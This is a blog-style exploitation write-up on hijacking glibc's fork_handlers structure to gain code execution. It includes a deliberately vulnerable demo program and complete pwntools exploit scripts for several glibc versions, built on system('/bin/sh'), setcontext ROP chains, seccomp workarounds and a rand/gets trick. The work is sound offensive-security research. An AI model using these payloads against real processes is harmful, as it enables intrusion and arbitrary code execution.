fork_handlers

The forgotten brother of __exit_funcs

Some of you may be familiar with the exit handlers, which are run when calling exit(). These are typically used to clean up before the program terminates, but they're also quite useful for attackers looking to hijack code execution. They're ideal because, by overwriting the __exit_funcs array, you can specify functions to be called, along with a controlled argument. However, one downside is that, because they're such a popular target, glibc applies pointer mangling to the function pointers.

However, there are other places where handlers like these are used. One that I stumbled across while investigating the exit handlers was the fork handlers, and after some digging, I found some tricks to abuse them to convert fork into a constraintless one gadget.

What are the fork handlers?

fork has its own handlers for multiple situations:

  • prepare_handler

  • parent_handler

  • child_handler

These are stored in a single array/linked list (depending on the glibc version) called fork_handlers, which exists in a writable region of libc memory, so that more handlers can be added. In each case, all of the handlers of the corresponding type are executed in a specific order. There are a few things that separate these from exit handlers:

  • No pointer mangling.

  • No argument control.

So 1 step forward, and 2 steps back. However, while we don't get explicit argument control like with exit handlers, there are tricks similar to what we did in ret2gets. To see that, let's have a closer look at fork across multiple versions, as the implementation of the handlers has changed, which also changes how we'd abuse them.

2.28-2.35

(The specific version used here is 2.35)

Let's first have a look at what a fork_handler looks like:

  • prepare_handler: Handlers to prepare the process to fork, so they're run before the fork.

  • parent_handler: Handlers run as the parent after the fork.

  • child_handler: Handlers run as the child after the fork.

  • dso_handle: A unique id to identify which binary/shared library registered this handler.

These are stored in an array called fork_handlers, which is defined as:

The way this definition works is by stating a few "parameters" using macros, then including malloc/dynarray-skeleton.c, which then defines a struct called fork_handler_list, plus a bunch of handlers for this struct.

These dynarray structures are dynamically allocated arrays, which can resize if needed. Usually they have an initial buffer before it goes to the heap. Evaluating this yields:

struct fork_handler_list {
        size_t used;
        size_t allocated;
        struct fork_handler* array;
        struct fork_handler scratch[48];
};
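To double check the offsets used by the forging helpers later on, here's a quick sketch that models the layout with ctypes. It assumes x86-64 (8-byte pointers and size_t) and that a fork_handler is just the four pointer-sized fields listed above. The class names are mine, and the first field is named after the used field referred to throughout this post.

```python
import ctypes

class ForkHandler(ctypes.Structure):
    # Four pointer-sized fields, as listed above (assumed x86-64 layout).
    _fields_ = [
        ("prepare_handler", ctypes.c_uint64),
        ("parent_handler", ctypes.c_uint64),
        ("child_handler", ctypes.c_uint64),
        ("dso_handle", ctypes.c_uint64),
    ]

class ForkHandlerList(ctypes.Structure):
    _fields_ = [
        ("used", ctypes.c_uint64),        # number of live elements
        ("allocated", ctypes.c_uint64),   # capacity of the backing storage
        ("array", ctypes.c_uint64),       # pointer to the element storage
        ("scratch", ForkHandler * 48),    # inline initial buffer
    ]

ELEM_SIZE = ctypes.sizeof(ForkHandler)
ARRAY_OFF = ForkHandlerList.array.offset
SCRATCH_OFF = ForkHandlerList.scratch.offset
TOTAL_SIZE = ctypes.sizeof(ForkHandlerList)

print(hex(ELEM_SIZE), hex(ARRAY_OFF), hex(SCRATCH_OFF), hex(TOTAL_SIZE))
```

So under these assumptions the header is 0x18 bytes, the array pointer sits at 0x10, and each element is 0x20 bytes, which is where the constants in the exploit helpers come from.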

fork is defined as follows:

Here we call __run_fork_handlers with atfork_run_prepare, indicating it wants to execute the prepare handlers.

So now it will go through the array starting from the last element (for backwards compatibility reasons), executing each prepare_handler if it exists. The methods fork_handler_list_size and fork_handler_list_at are some of the methods automatically defined when we defined fork_handler_list; they just get the length (used) and index the array, respectively. Locking may also be used if there are multiple threads running.
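As a rough mental model of that loop (not the glibc source, just a toy in Python), the prepare phase walks the list backwards and skips empty slots. The function name and the use of Python callables in place of function pointers are my own illustration.

```python
from typing import Callable, List, Optional

Handler = Optional[Callable[[], None]]

def run_prepare_handlers(prepare_handlers: List[Handler]) -> None:
    """Toy model: walk from the last element down to the first, skipping NULL slots."""
    for i in range(len(prepare_handlers) - 1, -1, -1):
        handler = prepare_handlers[i]
        if handler is not None:
            handler()

calls = []
handlers = [
    lambda: calls.append("first registered"),
    None,                                      # a handler without a prepare function
    lambda: calls.append("last registered"),
]
run_prepare_handlers(handlers)
print(calls)
```

The handler registered last runs first, which is why the exploit helpers later place the functions in reverse order.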

So what?

At first glance, taking control of code execution doesn't seem to be very doable, mainly due to the fact that we seemingly have no argument control. However, if we dig deeper, and look at the disassembly, we'll notice something interesting.

First it checks the first argument, edi: if it's 0, then it should run the prepare handlers. Then it checks whether it should use locking. If so, it jumps to +288, where it will lock, then resumes by jumping back to +23.

But then something interesting happens. [fork_handlers] is loaded into rbp (which corresponds to fork_handlers->used), then is loaded into rdi. How interesting! It then goes on to call the prepare_handler:

So theoretically, controlling the field used could grant us rdi control.

Why does this happen?

The reason for this is the same reason why ret2gets works. Let's go back to +84 (when the index is decremented):

+91 checks the index rbp is within the bounds of the array (less than used). If it's not, then it goes on to call __libc_dynarray_at_failure, interestingly setting a second argument, but not a first? Well that's because it already set the first argument: when used gets loaded. It could load used into any register, but chooses rdi, because in the case where this error happens, it doesn't need to waste time loading it into rdi again, because it's already there.

Exploitation

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void setup() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

int main() {
    setup();

    printf("%p\n", &fgets);
    printf("Enter address, size and data: ");
    unsigned long addr, size;
    scanf("%zu %zu ", &addr, &size);
    fgets((void*)addr, size, stdin);
    fork();
}

To demonstrate this, we'll use the very realistic application attack scenario above, where we have a libc leak, an arbitrary write, and a call to fork we want to hijack.

We can start by writing some basic methods to create the structures:

def header(addr, size):
    return flat({
        0x00: size,
        # we don't need to control allocated
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data
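If you want to see what handler_array produces without pulling in pwntools, here's a small equivalent using only struct. The name handler_array_plain and the dummy function addresses are made up for the demo, and ELEM_SIZE assumes the 0x20-byte fork_handler from 2.28-2.35.

```python
import struct

ELEM_SIZE = 0x20  # assumed size of one fork_handler on 2.28-2.35

def handler_array_plain(*funcs: int) -> bytes:
    """Same layout as handler_array: prepare_handler slots only, in reverse call order."""
    assert funcs
    # The last element only needs its first 8 bytes, hence the -0x18.
    data = bytearray(ELEM_SIZE * len(funcs) - 0x18)
    for i, func in enumerate(reversed(funcs)):
        struct.pack_into("<Q", data, i * ELEM_SIZE, func)
    return bytes(data)

blob = handler_array_plain(0x1111, 0x2222)   # call 0x1111 first, then 0x2222
slot0 = struct.unpack_from("<Q", blob, 0x00)[0]
slot1 = struct.unpack_from("<Q", blob, 0x20)[0]
print(len(blob), hex(slot0), hex(slot1))
```

The function we want called first ends up in the last slot, since the prepare handlers are walked from the end of the array.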

So we can use handler_array(libc.sym.system) to craft an array that will execute system, but we now need to control rdi. We can do this by setting used to a pointer to /bin/sh. However, if we point array at the real address of our handler array, then the huge used field will make it access invalid memory, since it starts from the last handler (index used-1). So if we need used to be an address, why don't we just alter the address of the handler array instead? As long as

fork_handlers->array[fork_handlers->used-1]

points to our handler, then it'll work. We can forge such an address as follows:

addr = (addr - (size-len(funcs))*0x20) % (1<<64)
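As a quick sanity check of that formula, here's a standalone sketch that redoes the pointer arithmetic with 64-bit wraparound. The addresses are hypothetical placeholders, and ELEM_SIZE assumes the 0x20-byte element of 2.28-2.35.

```python
MASK64 = (1 << 64) - 1
ELEM_SIZE = 0x20  # assumed sizeof(struct fork_handler) on 2.28-2.35

def fake_array_base(handlers_addr: int, used: int, n_funcs: int) -> int:
    """Shift the base back so the last n_funcs slots land on our forged data."""
    return (handlers_addr - (used - n_funcs) * ELEM_SIZE) & MASK64

def element_addr(base: int, index: int) -> int:
    """Address computed for array[index], wrapping like a 64-bit pointer would."""
    return (base + index * ELEM_SIZE) & MASK64

handlers_addr = 0x7ffff7e1b6b8   # hypothetical address of our forged handlers
used = 0x7ffff7dd8678            # hypothetical pointer to "/bin/sh"

base = fake_array_base(handlers_addr, used, n_funcs=2)
first_called = element_addr(base, used - 1)
second_called = element_addr(base, used - 2)
print(hex(base), hex(first_called), hex(second_called))
```

Even though base itself is garbage, the only elements that get touched (the last n_funcs of them) wrap right back around onto our data.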

Of course this will create an "address" that's complete nonsense, but that doesn't matter, as it won't access the start of the array (unless __register_atfork or __unregister_atfork is used). Putting this all together, we can arrive at the following exploit:

#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('vuln')
libc = ELF('libc', checksec=False)

p = e.process()

fgets = int(p.recvline(), 16)
log.info(f"fgets: {hex(fgets)}")

libc.address = fgets - libc.sym.fgets
log.info(f"libc: {hex(libc.address)}")

def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x20) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr

addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.system, rdi=next(libc.search(b"/bin/sh\x00")))

assert b"\n" not in data
p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

p.interactive()

Is that all we can do?

This is the basic payload, but we can do more than just this. Take for example, a case where seccomp is in place, and we don't have access to execve, meaning calling system is useless now! Is that all we can do with a function call with a controlled argument? Yes, thanks for reading.

This is where setcontext comes in! I covered this already here, but basically this allows us to get ROP through the use of a function resembling the sigreturn syscall. We can substitute this in as follows:

def setcontext(regs, addr):
    frame = SigreturnFrame()
    for reg, val in regs.items():
        setattr(frame, reg, val)
    # needed to prevent SEGFAULT
    setattr(frame, "&fpstate", addr+0x1a8)
    fpstate = {
        0x00: p16(0x37f),   # cwd
        0x02: p16(0xffff),  # swd
        0x04: p16(0x0),     # ftw
        0x06: p16(0xffff),  # fop
        0x08: 0xffffffff,   # rip
        0x10: 0x0,          # rdp
        0x18: 0x1f80,       # mxcsr
    }
    return flat({
        0x00: bytes(frame),
        # 0xf8: 0           # end of SigreturnFrame
        0x128: 0,           # uc_sigmask
        0x1a8: fpstate,     # fpstate
    })

addr = libc.sym.fork_handlers

addr_ctx = addr+0x20
data = forge(addr, libc.sym.setcontext, rdi=addr_ctx) + setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data

For demo purposes, I'm just executing execve, but you can do much more with setcontext.

gets

Both of these examples require the /bin/sh string or the SigreturnFrame to already exist in memory, or be a part of the arbitrary write. But what if we don't have such a luxury? Well, since rdi will be the same controlled value for every handler call, we can use gets to write data to the argument, before using it for system:

addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.gets, libc.sym.system, rdi=addr+0x200)
assert b"\n" not in data
# could also be any command we wish
extra_data = b"/bin/sh"

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

if extra_data:
    p.sendline(extra_data)

p.interactive()

Or setcontext:

addr = libc.sym.fork_handlers

addr_ctx = addr+0x20
data = forge(addr, libc.sym.gets, libc.sym.setcontext, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200,
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

if extra_data:
    p.sendline(extra_data)

p.interactive()

Seccomp strikes back!

Our good old friend (read: enemy) seccomp isn't always easily defeated by setcontext, because there's a nuisance I have yet to cover. If we have another look at setcontext:

We see that it executes a syscall before it sets the context, with syscall number 0xe. This is sigprocmask, and while it may not be on the radar of any blacklists, it could be easily left out of a whitelist (like seccomp's strict mode), meaning this could invoke seccomp's wrath.
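To make the whitelist point concrete, here's a tiny sketch using strict mode as the example. It assumes x86-64 syscall numbering and the strict-mode set described in seccomp(2) (read, write, _exit and sigreturn). The helper name is mine.

```python
# x86-64 syscall numbers (assumed architecture)
SYS_read = 0
SYS_write = 1
SYS_rt_sigprocmask = 14   # 0xe, the syscall setcontext makes first
SYS_rt_sigreturn = 15
SYS_exit = 60

# What strict mode lets through, per seccomp(2).
STRICT_MODE_ALLOWED = {SYS_read, SYS_write, SYS_rt_sigreturn, SYS_exit}

def allowed_in_strict_mode(nr: int) -> bool:
    return nr in STRICT_MODE_ALLOWED

setcontext_syscall = 0xe
print(allowed_in_strict_mode(setcontext_syscall))
```

So under a whitelist like this, calling setcontext from its start gets the process killed before any registers are restored.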

What if we tried to skip the syscall? It's a good suggestion, but a wrench in the plan here is the fact that it restores the pointer to the context in rdx, not rdi, so we'd need to control rdx somehow.

Wouldn't it be nice if we could convert our current rdi control into rdx control, because rdx isn't used by __run_fork_handlers. Well it turns out there is a gadget that can do just that!

Exactly one in fact. However if you're anything like me (and I surely hope not), you'd wonder where this came from, and is this something that's likely to come up across multiple versions of libc, because it would be nice if our techniques were portable(ish).

It seems to belong to a function __memset_erms, which in hindsight makes sense. It explains the rep stos instruction: it's filling the buffer with the character al. And since rep stos increments rdi, it needs to save a copy, so that it can return that original pointer, as that's the defined behaviour of memset.

But why did it compile like this, and why is rdx used, surely this could change, right? Well let's find out:

Turns out the reason it compiled that way is because that's exactly how libc wanted it: it's written in assembly language (.S is a common extension for assembly language files). From what I could see, this behaviour is also consistent across many versions, probably because there's no real reason to change it:

  • It's simple, so not much to change in the first place.

  • If it ain't broke, don't fix it.

  • It's not actually used, it's just used for performance measuring.

Fantastic, we have a mov rdx, rdi gadget! But one final snag, we ideally want to set rcx or rdx to 0 before this gadget executes, so that rep stos finishes immediately (i.e. doesn't run).

Putting this all together, we arrive at the following:

addr = libc.sym.fork_handlers

addr_ctx = addr+0x100
data = forge(addr, libc.sym.gets, libc.address+0xa85d8, libc.sym.__memset_erms+13, libc.sym.setcontext+45, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()

2.28-2.29

There's a weird edge case that I found with 2.28-2.29, which seems to coincide with the versions that didn't have the do_locking argument (which was added in 2.30).

Above we see that the used field is loaded into rax, but not into rdi. But after the first call:

used is loaded into rdi. Weird...

I can't quite explain why this happens, but this is more just a word of warning, that this isn't an exact science. If you find this happening, you can always just start by doing a ret to get past the first call, which would also be compatible with 2.30+.

And if it doesn't happen at all?

Well, rdi shouldn't be used by anything else if it's not used for used, so ret2gets would also be a possibility, though I have yet to test it.

2.36+

(The specific version used here is 2.39)

You'll have noticed that the previous section was specifically for 2.28-2.35. This is because the implementation of fork_handlers changes throughout the versions. So, what's changed now?

Well, not much actually. Firstly, the fork_handler struct has a new field: id

And a separate function for running prefork handlers has been created:

The function for running prefork handlers isn't much different either:

The main addition is the use of id. What the comments here seem to imply is that each handler now has a unique id, which increments each time a new one is added, so handlers added later have a larger id. Due to the different locking pattern here, handlers could be registered and/or de-registered while a prepare_handler is being executed, so it ensures that only handlers that were registered before the current one are executed, skipping any with a higher id.

For us, all this changes is the structure of fork_handler: we just need to include an id field that increases with each handler. The updated methods are as follows:

def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x28*len(funcs))
    for i, func in enumerate(funcs[::-1]):
        off = i*0x28
        data[off:off+8] = p64(func)
        data[off+0x20:off+0x28] = p64(i)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x28) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr
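To check the 2.36+ element layout without pwntools, here's a sketch with struct that builds the same array and parses it back. It assumes the 0x28-byte element with id at offset 0x20, as used by handler_array above. The function names and dummy addresses are made up for the demo.

```python
import struct

ELEM_SIZE = 0x28   # assumed size of fork_handler on 2.36+
ID_OFF = 0x20      # assumed offset of the id field

def handler_array_with_ids(*funcs: int) -> bytes:
    """Reverse call order, with ids increasing along the array."""
    assert funcs
    data = bytearray(ELEM_SIZE * len(funcs))
    for i, func in enumerate(reversed(funcs)):
        off = i * ELEM_SIZE
        struct.pack_into("<Q", data, off, func)        # prepare_handler
        struct.pack_into("<Q", data, off + ID_OFF, i)  # id
    return bytes(data)

def parse(blob: bytes):
    """Return (prepare_handler, id) for every element in the blob."""
    out = []
    for off in range(0, len(blob), ELEM_SIZE):
        prepare = struct.unpack_from("<Q", blob, off)[0]
        ident = struct.unpack_from("<Q", blob, off + ID_OFF)[0]
        out.append((prepare, ident))
    return out

elements = parse(handler_array_with_ids(0x1111, 0x2222, 0x3333))
print([(hex(p), i) for p, i in elements])
```

The element with the highest id is the one that runs first, and every handler after it has a lower id, so none of them get skipped by the id check.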

Revenge of the seccomp!

While these changes don't affect the regular cases for system("/bin/sh") or setcontext, it (indirectly) affects the setcontext case where we need to skip sigprocmask. In the version of glibc I used for the demo, rdx is used by __run_prefork_handlers:

Here we see at +128 that rdx=5*r14, where r14 is sl (the number of handlers). rdx then gets multiplied by 8, which ultimately means r14 got multiplied by 40 (0x28), the size of a fork_handler. This is in preparation for the loop where it checks the id fields, which is why it actually points to the previous handler's id field (-0x30 instead of -0x28).

In this case, we can actually set used to a value that, when multiplied by 5, points to a context. This will make rdi a junk value, which means you can't use gets to populate the context (RIP), but apart from that, it's no problem!

ret = ROP(libc).find_gadget(["ret"]).address

addr = libc.sym.fork_handlers

addr_ctx = addr+0x100
addr_ctx += (-addr_ctx) % 5
rdi = addr_ctx // 5

data = forge(addr, ret, libc.sym.setcontext+45, rdi=rdi)
data = data.ljust(addr_ctx-addr, b"X")
data += setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.interactive()
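The only fiddly part of that payload is the rounding, so here's the arithmetic on its own. It takes the rdx = 5*used observation from the disassembly at face value, and the address is a hypothetical placeholder.

```python
def align_up_to_multiple(value: int, n: int) -> int:
    """Round value up to the next multiple of n (no change if already aligned)."""
    return value + (-value) % n

def used_for_context(ctx_addr: int):
    """Pick a context address divisible by 5, and the used value that maps onto it."""
    aligned = align_up_to_multiple(ctx_addr, 5)
    return aligned, aligned // 5

ctx_hint = 0x7ffff7e1b7a1          # hypothetical spot where we'd like the context
addr_ctx, used = used_for_context(ctx_hint)
print(hex(addr_ctx), hex(used), hex(used * 5))
```

At most 4 bytes of padding are added, which is why the payload is padded out with ljust before the context is appended.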

2.27 and prior

(The specific version used here is 2.27)

You may be wondering why I'm ending with the earliest implementation. This is because the later versions are more trivial, both in how fork_handlers is implemented and in how they're exploited. In 2.27 and prior, we no longer have the rdi control trick through the used field.

fork_handler is now defined as:

A few more fields than before:

  • next: Points to next handler, as __fork_handlers is now a singly linked list.

  • refcntr: Reference count of this handler.

  • need_signal: Unused in fork, so we'll ignore it.

We're no longer using a dynarray, so there is no used field to control to gain rdi control (cringe). Let's have a look at fork then:

Not much so far: it just checks THREAD_SELF to see whether the process is multi-threaded. There's also no separate function for handling the fork handlers anymore: it's incorporated into fork itself.

First it needs to access the root of the linked list of handlers: __fork_handlers. However, since the process could be multi-threaded and they hadn't discovered locking yet, it needs to do it in a thread-safe way (hence the weirdness with atomic_full_barrier etc.). The gist is that it will grab __fork_handlers if it exists, and (atomically) increment the refcntr to claim ownership of it, ensuring it doesn't get freed while it's in use here.

A lock doesn't seem to be needed, as the fork_handler entries are constant (besides refcntr, which is handled atomically, therefore not susceptible to racing). While it does work, the code with locking is just nicer.

This now seems familiar, but instead of accessing an array, it's cycling through a linked list. It also saves the handlers it uses, so that it can run the same ones later for parent_handler and child_handler. To do this, it needs to claim ownership, so it increments the refcntr.

Importantly, there are no function calls with arguments present here, except for alloca (compiler builtin) and atomic_increment (asm block). So unlike 2.28+, there's no rdi control, because no functions (with a first argument) are called.

We can write methods to forge a fork_handler list as follows:

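def forge(addr, *funcs):
    assert funcs
    data = b""
    for i, func in enumerate(funcs):
        # every node points at the node that follows it; the last one ends the list
        next_node = addr+len(data)+0x30
        data += flat({
            0x00: next_node if i != len(funcs)-1 else 0,
            0x08: func,         # prepare_handler
            0x28: p32(1),       # refcntr, must be non-zero
        }, length=0x30)
    return data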

def forge_packed(addr, *funcs, smallest=False):
    assert funcs
    if smallest:
        # some refcntrs are outside our data
        # (except the first one, which we need to control)
        # these will be incremented, and potentially corrupt some memory
        # be careful when using this
        size = max(0x28+4, 0x10*len(funcs))
    else:
        # all refcntrs are contained in our data
        size = 0x28 + 0x10*len(funcs) - 0xc
    data = bytearray(size)
    addrs = [addr+0x10*i for i in range(1, len(funcs))] + [0]
    for i, (addr, func) in enumerate(zip(addrs, funcs)):
        off = i*0x10
        data[off:off+0x10] = p64(addr) + p64(func)
    for i in range(len(funcs)):
        off = 0x28 + 0x10*i
        if off+4 > len(data):
            break
        val = u32(bytes(data[off:off+4])) - 1
        # the first refcntr must be non-zero
        # otherwise it'll loop forever
        if i == 0:
            assert val != 0
        data[off:off+4] = p32(val % (1<<32))
    return bytes(data)

You can do a standard array (forge), or you can utilise the unused space to pack it as much as possible (forge_packed). Both must contain at least the first refcntr though, as we need to ensure that that is non-zero. The rest of the refcntr's will be incremented, and if these are outside our data, they might corrupt other data, but if that's not a concern, then you can use smallest=True.
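To convince yourself that a forged list is walked the way we want, here's a pwntools-free sketch that builds the plain (unpacked) layout and then follows the next pointers like fork would. It assumes the 0x30-byte node with next at 0x00, prepare_handler at 0x08 and refcntr at 0x28. The function names, base address and dummy function addresses are made up for the demo.

```python
import struct

NODE_SIZE = 0x30
NEXT_OFF, PREPARE_OFF, REFCNTR_OFF = 0x00, 0x08, 0x28

def forge_list(addr: int, *funcs: int) -> bytes:
    """Each node points at the node after it; the last node's next is NULL."""
    assert funcs
    data = bytearray()
    for i, func in enumerate(funcs):
        is_last = i == len(funcs) - 1
        next_node = 0 if is_last else addr + (i + 1) * NODE_SIZE
        node = bytearray(NODE_SIZE)
        struct.pack_into("<Q", node, NEXT_OFF, next_node)
        struct.pack_into("<Q", node, PREPARE_OFF, func)
        struct.pack_into("<I", node, REFCNTR_OFF, 1)   # non-zero refcntr
        data += node
    return bytes(data)

def walk(addr: int, blob: bytes):
    """Follow next pointers from the head, collecting prepare_handler in call order."""
    order = []
    cur = addr
    while cur != 0:
        off = cur - addr
        nxt, func = struct.unpack_from("<QQ", blob, off)
        (refcntr,) = struct.unpack_from("<I", blob, off + REFCNTR_OFF)
        assert refcntr != 0
        order.append(func)
        cur = nxt
    return order

BASE = 0x10000   # hypothetical address the list is written to
order = walk(BASE, forge_list(BASE, 0xaaa, 0xbbb, 0xccc))
print([hex(f) for f in order])
```

Unlike the dynarray versions, the handlers here run in list order, so there's no need to reverse anything.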

ret2rand

Therefore the only way we can control rdi is through prepare_handler calls. We need a function that will populate rdi with some writable address, which we could then write to using gets. ret2gets is unfortunately not very applicable here, as it's quite limited prior to 2.30 (see here).

Thankfully, I was able to find an alternative: rand.

rand is a pseudo random number generator, and with that comes the need to keep track of the random state. In this case, that state is unsafe_state, which is of type random_data:

This state is passed to __random_r, as the first argument 👀. What's more is that __random_r is relatively simple, doesn't make any function calls, or alter the pointer itself, which means that it can just keep unsafe_state in rdi (we'll look at this in a bit).

But what about the locking?

Well that's a good question, because we've seen before (in ret2gets) that locking lock can result in lock being loaded into rdi.

Ah, it's our good ol' friend lll_unlock.

Just like in ret2gets prior to 2.30, it only unlocks by using __lll_unlock_wake_private when it's multi-threaded, thus the single thread case works flawlessly and doesn't touch rdi.

The multi-threaded case is a bit more complex, but if it's locked with the value LLL_LOCK_INITIALIZER_LOCKED (1), then it also doesn't touch rdi (yay). However, lock can also contain the value LLL_LOCK_INITIALIZER_WAITERS (2), in which case the dec won't result in 0, and it will execute __lll_unlock_wake_private, thus clobbering rdi.

This should be unlikely to happen to rand's lock, as you'd need multiple threads trying to access rand at the same time, but it's not impossible, so be careful.

Exploitation

So let's go back to random, specifically __random_r. We can use rand followed by gets to write to the unsafe_state, but we'll need to call rand again to put unsafe_state back into rdi after gets. And if we call rand using a corrupted unsafe_state, then we could cause a crash?

So we need to conform to random_data:

But this contains multiple pointers, including at the beginning, where we might want to put /bin/sh string for example! But are these always used? Let's check __random_r:

At first glance, we can see the fptr, rptr, state pointers being used in the else clause. However, there's an interesting case: buf->rand_type == TYPE_0. This seems to be much simpler, and doesn't use fptr or rptr! It does still use state, but as long as it's populated with a writable address, it won't SEGFAULT. The default rand_type is TYPE_3, but we can easily overwrite it to TYPE_0.
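For reference, here's a Python sketch of what the TYPE_0 branch does, as far as I can tell from random_r.c: a plain linear congruential step on state[0], and nothing else. The function name is mine, and a Python list stands in for the memory that state points to.

```python
def random_r_type0(state: list) -> int:
    """Model of the TYPE_0 path: only state[0] is read and written."""
    val = (state[0] * 1103515245 + 12345) & 0x7fffffff
    state[0] = val
    return val

state = [1, 0xdead, 0xbeef]   # only the first word should ever change
result = random_r_type0(state)
print(result, state)
```

This is why a single writable address in the state field is enough: one 4-byte read and write, with no fptr or rptr involved.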

Putting this together, we arrive at the following for system("/bin/sh"):

addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.system)
assert b"\n" not in data

extra_data = flat({
    0x00: b"/bin/sh\x00",
    0x10: libc.sym.randtbl+4,    # the previous `state` field
    0x18: p32(0),   # TYPE_0
})
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
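The offsets used in extra_data can be cross-checked with a ctypes model of the state struct. This assumes x86-64 and the field order fptr, rptr, state, rand_type, rand_deg, rand_sep, end_ptr, which is how I remember struct random_data from the glibc headers. Treat it as a sketch rather than gospel.

```python
import ctypes

class RandomData(ctypes.Structure):
    # Assumed layout of the state behind unsafe_state on x86-64.
    _fields_ = [
        ("fptr", ctypes.c_uint64),
        ("rptr", ctypes.c_uint64),
        ("state", ctypes.c_uint64),
        ("rand_type", ctypes.c_int32),
        ("rand_deg", ctypes.c_int32),
        ("rand_sep", ctypes.c_int32),
        ("end_ptr", ctypes.c_uint64),
    ]

STATE_OFF = RandomData.state.offset
RAND_TYPE_OFF = RandomData.rand_type.offset
print(hex(STATE_OFF), hex(RAND_TYPE_OFF), hex(ctypes.sizeof(RandomData)))
```

That leaves the first 0x10 bytes (fptr and rptr) free for our own data, such as the /bin/sh string, as long as rand_type is TYPE_0.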

We're also able to use this for setcontext:

addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.setcontext)
assert b"\n" not in data

ucontext = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": libc.sym.unsafe_state+0x200
}, libc.sym.unsafe_state)

extra_data = flat({
    0x00: b"/bin/sh\x00",
    0x10: libc.sym.randtbl+4,
    0x18: p32(0),   # TYPE_0
})
extra_data += ucontext[len(extra_data):]
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()

Return of the seccomp

This time our work is actually mostly done for us, because in 2.27 and prior, setcontext doesn't use rdx for the ucontext.

So it's just as simple as jumping to setcontext+37 (or later).

Detecting arguments to handlers

It can be quite cumbersome to check the disassembly to see what the arguments are going to be ahead of time. That's why I wrote a script, just like with ret2gets, which will trace fork with angr, and log what the arguments to each call to prepare_handler were.

detect_fork.py

fork -> one_gadget

So why would we care about this? I mean sure, we can control fork to either execute system for a shell, or setcontext for ROP/shellcode, but that's only useful if there are calls to fork. Not all applications will use fork, after all.

What about functions in glibc? Surely some of them will use fork. After all, there are functions like system, which create a new process to execute a shell command, right?

Well unfortunately not many glibc functions use __libc_fork.

The rest, like system or popen will use an inlined clone call.

Well, like I mentioned in the beginning, by overwriting fork_handlers, we effectively have turned fork into a one_gadget. However, this has a few benefits over a regular one_gadget:

  • No constraints.

  • Can trigger ROP.

So if you have a function call primitive, and don't have strong argument control, but can use an arbitrary write, this may be useful.

However, a lot of what's been done here can also be done with exit, and more easily, as that has explicit argument control. The only downside there is that you have to deal with pointer mangling too.

In conclusion, there may be some cases where this can be useful, but even if this is never used, I still think it was interesting, and I hope you did too :)
